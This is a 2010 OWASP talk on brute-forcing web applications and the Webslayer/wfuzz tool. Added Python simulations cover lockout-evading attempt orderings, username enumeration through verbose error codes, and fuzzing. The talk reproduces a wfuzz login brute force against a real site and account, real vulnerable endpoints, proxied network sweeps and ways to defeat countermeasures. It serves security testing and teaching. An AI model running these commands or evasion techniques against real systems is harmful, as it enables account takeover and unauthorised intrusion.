2010: and still bruteforcing


2010: and still bruteforcing. OWASP Webslayer. Christian Martorella, July 18th 2010, Barcelona.

Who am I: Audit Manager; CISSP, CISA, CISM, OPST, OPSA, CEH; OWASP WebSlayer Project Leader; FIST Conference, President; Edge-Security.com.

Brute force attack: a method to determine an unknown value by using an automated process to try a large number of possible values.

What can be bruteforced?
- Credentials (HTML forms and HTTP authentication)
- Session identifiers (session IDs)
- Predictable resource locations (directories and files)
- Variable values
- Cookies
- Web service methods (REST)

Where?
- Headers
- Forms (POST)
- URL (GET)
- Authentication (Basic, NTLM)

How?
- Dictionary attack
- Search attack (all possible combinations of a character set at a given length)
- Rule-based search attack (rules generate the candidates)

Why "2010 and still bruteforcing"? In 2007 Gunter Ollmann proposed a series of countermeasures to stop automated attack tools (see "Stopping Automated Attack Tools" in the references). Three years later, brute force still works.

Countermeasures (Ollmann):
- Block HEAD requests
- Timeouts and thresholds
- Referer checks
- Tokens
- Turing tests (CAPTCHAs)
- Honeypot links
- One-time links
- Custom messages
- Token resource metering (Hashcash)

Workarounds: CAPTCHA breakers

Workarounds: distributing the scanning source traffic across proxies
Attacker -> HTTP proxy 1 / HTTP proxy ... / HTTP proxy N -> Target

Workarounds: distributing the scanning across different targets
Attacker -> Target-server-1, Target-server-2, Target-server-3

Workarounds: scanning strategies
- Vertical scanning (many passwords against a single username; the pattern that per-account lockout thresholds are built to catch)
- Diagonal scanning (a different username and a different password on each round)
- Horizontal scanning (different usernames for common passwords)
- Three dimensions (horizontal, vertical or diagonal + distributed source IPs)
- Four dimensions (horizontal, vertical or diagonal + time delay between attempts)
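The effect of these orderings is easiest to see against a concrete lockout policy. The following is an added example, not code from the talk or from Webslayer: the accounts, the password list, the single valid credential and the lockout model (lock an account after three failures inside a sliding ten-second window and keep it locked for the rest of the run) are all constructed assumptions.

```python
"""Attempt ordering versus a per-account lockout threshold.

Added illustrative example, not code from the talk or from Webslayer. The
accounts, the password list, the one valid credential and the lockout model
(assumed: lock an account after `threshold` failures inside a sliding window
of `window` seconds, and keep it locked for the rest of the run) are all
constructed assumptions.
"""
from collections import defaultdict

# Constructed sample data: six accounts, six "worst passwords"-style guesses,
# and one real credential hidden among them.
USERS = ["alice", "bob", "carol", "dave", "erin", "frank"]
PASSWORDS = ["123456", "password", "qwerty", "letmein", "welcome", "monkey"]
VALID = {"erin": "letmein"}


def vertical(users, passwords):
    """Classic brute force: every password against one user, then the next user."""
    for user in users:
        for password in passwords:
            yield user, password


def horizontal(users, passwords):
    """One password against every user before moving to the next password."""
    for password in passwords:
        for user in users:
            yield user, password


def diagonal(users, passwords):
    """Different user *and* different password on every attempt. Shifting the
    password index by one per pass still covers every (user, password) pair
    exactly once."""
    count = len(passwords)
    for shift in range(count):
        for i, user in enumerate(users):
            yield user, passwords[(i + shift) % count]


def simulate(attempts, valid, threshold=3, window=10.0, delay=1.0):
    """Replay an attempt sequence against the assumed lockout model.

    Attempts are spaced `delay` seconds apart. Returns
    (found, locked_accounts, attempts_used, elapsed_seconds); `found` is
    False when the valid credential was never reached or its account was
    already locked when it came up.
    """
    failures = defaultdict(list)   # account -> timestamps of recent failures
    locked = set()
    n = t = 0
    for n, (user, password) in enumerate(attempts, 1):
        t = n * delay
        if user in locked:
            continue                # answered with "account locked", never evaluated
        if valid.get(user) == password:
            return True, len(locked), n, t
        failures[user] = [f for f in failures[user] if f > t - window] + [t]
        if len(failures[user]) >= threshold:
            locked.add(user)
    return False, len(locked), n, t


def compare(threshold=3, window=10.0):
    """Run each strategy, plus vertical scanning with a 5 s delay (the
    'fourth dimension' on the slide), and return the results keyed by name."""
    return {
        "vertical": simulate(vertical(USERS, PASSWORDS), VALID, threshold, window),
        "horizontal": simulate(horizontal(USERS, PASSWORDS), VALID, threshold, window),
        "diagonal": simulate(diagonal(USERS, PASSWORDS), VALID, threshold, window),
        "vertical+delay": simulate(vertical(USERS, PASSWORDS), VALID, threshold, window, delay=5.0),
    }


if __name__ == "__main__":
    for name, (found, locked, used, elapsed) in compare().items():
        print(f"{name:15s} found={found!s:5s} locked={locked} attempts={used} time={elapsed:.0f}s")
```

With these numbers the vertical run locks all six accounts and never reaches the valid password, while horizontal and diagonal scanning keep every account below the threshold and find it with no lockout at all; adding a 5 s delay lets even vertical scanning slip under the window, at the cost of 140 s instead of 36 s. A per-account counter therefore only sees the first pattern, which is why the defender's side of this slide needs counters that span accounts (per source IP, per target, globally), and why the attacker's next move is distributing the source IPs.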

2010... AT&T iPad e-mail address harvest: 114,000 e-mail addresses obtained by iterating the ICCID parameter of https://dcp2.att.com/oepclient/openpage?iccid=number&imei=0

2010... Access any user's photo albums: http://www.facebook.com/album.php?aid=-3&id=1508034566&l=aad9c
- aid=-3 (the same value for every public profile album)
- id=0123456789 (the numeric profile ID)
- l=? (the only unknown: 5 characters from the range 0123456789abcdef, i.e. 16^5 = 1,048,576 candidates, a space small enough to brute force)

2010... Password lists to feed the attack:
- The 500 worst passwords list
- Alyssa banned passwords list
- Cain's list of passwords
- Conficker's list
- The English dictionary
- Faithwriters banned passwords list
- Hak5's list
- Hotmail's banned passwords list
- Myspace's banned passwords list
- PHPbb's compromised list
- RockYou's compromised list
- Twitter's banned passwords list


2010... Web services: http://l33.login.scd.yahoo.com/config/isp_verify_user?l=username&p=password answers OK:0:username on success, ERROR:101:Invalid Password for a valid username with the wrong password, and ERROR:102:Invalid Login for an unknown username. The two distinct error codes let an attacker enumerate valid usernames first and then spend the password guesses only on accounts that exist.
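How an oracle of that shape is turned into a username list, and what the response looks like once the two failure cases are merged, as an added example (not the talk's code and not Yahoo's service): `verbose_verify` is a constructed stand-in that answers in the three response formats quoted on the slide, `uniform_verify` is the hardened counterpart, and the account table is made up.

```python
"""Username enumeration through a verbose authentication oracle.

Added example, not the talk's code and not Yahoo's service: `verbose_verify`
is a constructed stand-in that answers in the three response formats quoted on
the slide, `uniform_verify` is the hardened counterpart, and the account table
is made up.
"""
import re

# Constructed back-end accounts.
ACCOUNTS = {"jdoe": "hunter2", "msmith": "Summer2010"}

RESPONSE_RE = re.compile(r"^(OK|ERROR):(\d+):(.*)$")


def verbose_verify(user, password):
    """Answers differently for an unknown user and for a wrong password:
    the weakness the slide's example exposes."""
    if user not in ACCOUNTS:
        return "ERROR:102:Invalid Login"
    if ACCOUNTS[user] != password:
        return "ERROR:101:Invalid Password"
    return f"OK:0:{user}"


def uniform_verify(user, password):
    """Hardened variant: the same failure line whether or not the user exists."""
    if ACCOUNTS.get(user) == password:
        return f"OK:0:{user}"
    return "ERROR:100:Invalid Login"   # constructed generic code and message


def classify(response):
    """Translate one response line into what it tells the attacker."""
    match = RESPONSE_RE.match(response)
    if match is None:
        raise ValueError(f"unexpected response format: {response!r}")
    status, code, _message = match.groups()
    if status == "OK":
        return "valid_credentials"
    if code == "101":
        return "user_exists"          # right username, wrong password
    if code == "102":
        return "no_such_user"
    return "failure"                  # generic error: nothing learned about the user


def enumerate_users(verify, candidates, probe_password="x"):
    """Horizontal pass with one throwaway password. Every candidate whose
    answer distinguishes 'wrong password' from 'unknown user' is confirmed."""
    confirmed = []
    for user in candidates:
        verdict = classify(verify(user, probe_password))
        if verdict in ("user_exists", "valid_credentials"):
            confirmed.append(user)
    return confirmed


def guess_passwords(verify, users, wordlist):
    """Second stage: run the wordlist only against confirmed accounts and
    return the credentials that produced an OK line."""
    found = {}
    for user in users:
        for password in wordlist:
            if classify(verify(user, password)) == "valid_credentials":
                found[user] = password
                break
    return found


if __name__ == "__main__":
    candidates = ["admin", "jdoe", "root", "msmith", "test"]
    wordlist = ["123456", "password", "hunter2"]
    users = enumerate_users(verbose_verify, candidates)
    print("confirmed users:", users)                       # ['jdoe', 'msmith']
    print("credentials:", guess_passwords(verbose_verify, users, wordlist))
    print("against the hardened oracle:", enumerate_users(uniform_verify, candidates))
```

Against the verbose oracle one probe per candidate is enough to separate real accounts from guesses, so the expensive password stage runs only on confirmed users; against the uniform oracle the same probe pass returns nothing, and the attacker is back to guessing username and password together.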

2010... Password brute force against an HTML login form, hit after 946 attempts:
python wfuzz.py -c -z file -f wordlists/common.txt --hc 200 -d "email=securik@gmail.com&input_password=FUZZ&timezone=1" "https://www.tuenti.com/?m=login&func=do_login"
(-z file -f selects the wordlist, FUZZ marks the injection point inside the POST body given with -d, and --hc 200 hides every response with status 200, i.e. the failed logins, so only the successful attempt is left in the output.)

Tools: automated scanning tools are designed to take full advantage of the stateless nature of HTTP and of insecure development techniques.

Tools: Webslayer is the evolution of WFUZZ.

Webslayer: the main objective is to give the security tester a tool to perform highly customized brute force attacks on web applications, together with a useful interface for analysing the results. It was designed with the professional tester in mind.


Webslayer targets:
- Predictable credentials (HTML forms and HTTP authentication)
- Predictable session identifiers (cookies, hidden fields, URL)
- Predictable resource locations (directories and files)
- Variable values and ranges
- Cookies
- Web service methods
- Traversals, injections, overflows, etc.

Webslayer features:
- Encodings: 15 encodings supported
- Authentication: supports NTLM and Basic (known or guessed credentials)
- Multiple payloads: two payloads can be used in different parts of the request
- Proxy support (proxy authentication supported)
- Multithreaded
- Multiple filters, for improving performance and for producing cleaner results

Webslayer features (continued):
- Predictable resource location: recursion, common extensions, non-standard response code detection, a huge collection of dictionaries
- Advanced payload generation
- Live filters
- Session saving/restoring
- Integrated browser (WebKit)
- Full page screenshot

Resource location prediction: based on the idea of DIRB (The Dark Raver). Custom dictionaries of known resources or common passwords:
- Servers: Tomcat, WebSphere, WebLogic, Vignette, etc.
- Common words: common (950 entries), big (3500 entries), Spanish
- CGIs (known vulnerabilities)
- Web services
- Injections (SQL, XSS, XML, traversals)

Payload generation. The payload generator produces:
- Usernames
- Credit card numbers
- Permutations
- Character blocks
- Ranges
- Files
- Pattern creator and regular expressions (with encoders)

Demo

Advanced uses: sweep an entire range with a common dictionary
http://192.168.1.FUZZ/FUZ2Z
FUZZ: range [1-254]
FUZ2Z: common.txt

Advanced uses: scanning through proxies (me ----> server with proxy ----> LAN)
wfuzz -x serverip:53 -c -z range -r 1-254 --hc XXX -t 5 http://10.10.1.FUZZ
-x sets the proxy (here one listening on port 53 of a server that reaches the internal LAN), -z range -r 1-254 generates the last octet, -t 5 runs five threads, and --hc XXX hides the error code XXX from the results, since hosts without a web server fail the request.
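The mechanics shared by the three command lines above (the login brute force, the range sweep and the proxied scan) are a request template with one or more payload keywords, a cartesian product over the payload lists, and a filter that hides the uninteresting status code. The following is an added example that reimplements just that, not wfuzz's or Webslayer's own code: nothing is sent on the network, the `fake_http` responder and its table of live hosts and paths are constructed, and the proxy (-x) is not modelled.

```python
"""Template expansion with several payloads and status-code filtering: the
mechanics behind the wfuzz/Webslayer command lines above (FUZZ / FUZ2Z
keywords, a numeric range, a wordlist and --hc).

Added example, not wfuzz's own code. Nothing is sent on the network: the
`fake_http` responder and its table of live hosts and paths are constructed,
and the proxy option (-x) is not modelled.
"""
import re
from itertools import product

KEYWORD_RE = re.compile(r"FUZ(\d*)Z")   # FUZZ -> payload 1, FUZ2Z -> payload 2, ...


def expand(template, *payloads):
    """Yield (values, request) for the cartesian product of the payload lists;
    FUZZ is replaced by the first list's value, FUZ2Z by the second's, etc."""
    def fill(values):
        return KEYWORD_RE.sub(lambda m: values[int(m.group(1) or 1) - 1], template)
    for values in product(*payloads):
        yield values, fill(values)


def number_range(low, high):
    """The equivalent of `-z range -r low-high`."""
    return [str(i) for i in range(low, high + 1)]


# Constructed network: only two hosts in 192.168.1.0/24 run a web server.
LIVE = {
    "http://192.168.1.10/": 200,
    "http://192.168.1.10/admin": 200,
    "http://192.168.1.10/backup": 403,
    "http://192.168.1.25/": 200,
    "http://192.168.1.25/admin": 200,
}
LIVE_HOSTS = {url.split("/")[2] for url in LIVE}


def fake_http(url):
    """Return a status code: the table entry for known paths, 404 for any other
    path on a live host, and 0 (connection failed) where nothing listens."""
    host = url.split("/")[2]
    if host not in LIVE_HOSTS:
        return 0
    return LIVE.get(url, 404)


def fuzz(template, payloads, hide_codes, send=fake_http):
    """Request every expansion and drop the responses whose status is in
    `hide_codes` (what --hc does), returning the surviving (url, code) pairs."""
    hits = []
    for _values, url in expand(template, *payloads):
        code = send(url)
        if code not in hide_codes:
            hits.append((url, code))
    return hits


if __name__ == "__main__":
    # Sweep the whole /24 with a small dictionary: FUZZ is the last octet,
    # FUZ2Z the path. Connection failures (0) and 404s are hidden.
    words = ["", "admin", "backup", "login"]
    for url, code in fuzz("http://192.168.1.FUZZ/FUZ2Z",
                          [number_range(1, 254), words], hide_codes={0, 404}):
        print(code, url)
```

The sweep issues 254 x 4 requests and the filter reduces them to the five that matter (two live roots, two admin paths and one forbidden backup directory). Swapping `fake_http` for a real HTTP client turns this into the slide's range sweep; pointing that client at the proxy gives the proxied scan, where the hidden code is whatever the proxy returns for a dead host rather than 0.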

Future features:
- Time delay between requests
- Multiple proxies (distributed attack)
- Diagonal scanning (mixing dictionaries)

Questions?

Contact:
cmartorella _at_ s21sec.com
cmartorella _at_ edge-security.com
http://twitter.com/laramies
http://laramies.blogspot.com
http://www.edge-security.com

References:
http://www.owasp.org/index.php/testing_for_brute_force_(owasp-at-004)
http://projects.webappsec.org/predictable-resource-location
http://projects.webappsec.org/credential-and-session-prediction
http://projects.webappsec.org/brute-force
http://www.technicalinfo.net/papers/stoppingautomatedattacktools.html
http://gawker.com/5559346/
http://tacticalwebappsec.blogspot.com/2009/09/distributed-brute-force-attacks-against.html
http://praetorianprefect.com/archives/2010/06/114000-ipad-owners-the-script-that-harvested-theire-mail-addresses/
http://www.securitybydefault.com/2009/07/no-no-uses-captchas-ni-ningun-otro.html
http://nukeit.org/facebook-hack-access-any-users-photo-albums/